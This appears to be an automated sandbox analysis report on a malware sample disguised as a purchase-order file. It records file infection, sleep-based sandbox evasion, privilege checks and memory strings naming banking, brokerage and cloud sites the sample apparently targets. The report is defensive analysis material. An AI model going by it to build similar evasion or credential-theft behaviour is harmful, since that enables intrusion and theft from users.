Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5902
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3874
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5669
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4093
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7679
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7603
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2059
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\servertool.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\RDCNotificationClient\FullTrustNotifier.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\pingsender.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\Office16\OSPPREARM.EXE
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedgewebview2.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\default-browser-agent.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Google\GoogleUpdater\135.0.7023.0\updater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\LogTransport2.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\filecompare.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7z.exe
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Dropped PE file which has not been started: C:\Windows\System32\DiagSvcs\DiagnosticsHub.StandardCollector.Service.exe
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Dropped PE file which has not been started: C:\Windows\System32\AppVClient.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\crashreporter.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRWindowsClientService.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\64BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zG.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\MSRMSPIBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\CRLogTransport.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcrobatInfo.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevation_service.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\identity_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_proxy.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\os_update_handler.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\AcroCEF.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\notification_click_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVLP.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\maintenanceservice.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AdobeCollabSync.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\firefox.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\pwahelper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\updater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Check.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\policytool.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADNotificationManager.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ADelRCP.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.ShowHelp.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\Uninstall.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\setup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\IntegratedOffice.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmiregistry.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Addons\OneDriveSetup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrobat_sl.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroCEF\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Dropped PE file which has not been started: C:\Windows\System32\msdtc.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\msedge_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\setup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\Installer\setup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\minidump-analyzer.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\pack200.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\x86\Acrobat\Acrobat.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\rmid.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\7-Zip\7zFM.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\plug_ins\pi_brokers\32BitMAPIBroker.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\Installer\setup.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\tnameserv.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\BHO\ie_to_edge_stub.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\Eula.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate32.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\Adobe\Acrobat\Setup\{AC76BA86-1033-1033-7760-BC15014EA700}\WindowsInstaller-KB893803-v2-x86.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Integration\Integrator.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\AcroTextExtractor.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\Installer\chrmstp.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\excelcnv.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\private_browsing.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\notification_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\pwahelper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Au3Info.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\elevation_service.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\notification_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\cookie_exporter.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_acro.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeC2RClient.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\ShowAppPickerForPDF.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\pwahelper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\orbd.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\chrome_pwa_launcher.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\AppVShNotify.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\SingleClientServicesUpdater.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\134.0.6998.36\elevated_tracing_service.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Adobe\Acrobat DC\Acrobat\NGL\cefWorkflow\adobe_licensing_wf_helper_acro.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files\Mozilla Firefox\plugin-container.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\EdgeCore\117.0.2045.47\identity_helper.exe
Source: C:\Windows\System32\alg.exe Dropped PE file which has not been started: C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Windows\System32\FXSSVC.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.55\elevation_service.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe API coverage: 4.7 %
Source: C:\Windows\System32\alg.exe TID: 4008 Thread sleep time: -270000s >= -30000s
Source: C:\Windows\System32\alg.exe TID: 2764 Thread sleep time: -60000s >= -30000s
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe TID: 1632 Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 2028 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\build.exe TID: 7176 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 5024 Thread sleep time: -26747778906878833s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 4916 Thread sleep count: 2359 > 30
Source: C:\Users\user\AppData\Local\Temp\XClient.exe TID: 4916 Thread sleep count: 7442 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7892 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Users\user\AppData\Local\antholite\exhilaratingly.exe TID: 8096 Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7268 Thread sleep time: -8301034833169293s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2068 Thread sleep count: 7679 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2068 Thread sleep count: 2000 > 30
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8072 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3652 Thread sleep time: -7378697629483816s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 7844 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\XClient.exe TID: 3144 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\build.exe WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\alg.exe Last function: Thread delayed
Source: C:\Users\user\AppData\Local\Temp\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Roaming\XClient.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046445A GetFileAttributesW,FindFirstFileW,FindClose, 0_2_0046445A
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046C6D1 FindFirstFileW,FindClose, 0_2_0046C6D1
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046C75C FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf, 0_2_0046C75C
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046EF95 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046EF95
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046F0F2 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose, 0_2_0046F0F2
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046F3F3 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046F3F3
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004637EF FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_004637EF
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_00463B12 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose, 0_2_00463B12
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_0046BCBC FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose, 0_2_0046BCBC
Source: C:\Users\user\Desktop\RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe Code function: 0_2_004049A0 GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 0_2_004049A0
Source: C:\Windows\System32\alg.exe Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\build.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Local\Temp\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\XClient.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath\javaws.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\java.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaw.exe
Source: C:\Windows\System32\alg.exe File opened: C:\Program Files (x86)\common files\Oracle\Java\javapath_target_749031\javaws.exe
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552x
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: discord.comVMware20,11696487552f
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: dev.azure.comVMware20,11696487552j
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: account.microsoft.com/profileVMware20,11696487552u
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Canara Transaction PasswordVMware20,11696487552}
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: www.interactivebrokers.comVMware20,11696487552}
Source: RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000C0A000.00000004.00000020.00020000.00000000.sdmp, RFQ-ON736672-MATERIALS-SPECIFICATIONS-ORDER.exe, 00000000.00000002.1233970872.0000000000BCD000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1248289335.00000000004CB000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1248581462.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1312296680.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1290392743.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1292422289.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.1250129106.00000000004C5000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000004.00000002.1261168452.0000000000A58000.00000004.00000020.00020000.00000000.sdmp, exhilaratingly.exe, 00000014.00000002.1394906415.0000000000C1B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: turbotax.intuit.comVMware20,11696487552t
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ms.portal.azure.comVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - COM.HKVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: global block list test formVMware20,11696487552
Source: build.exe, 00000006.00000002.1776990711.0000000003CCE000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696487552z
Source: build.exe, 00000006.00000002.1776990711.0000000003ED6000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: tasks.office.comVMware20,11696487552o
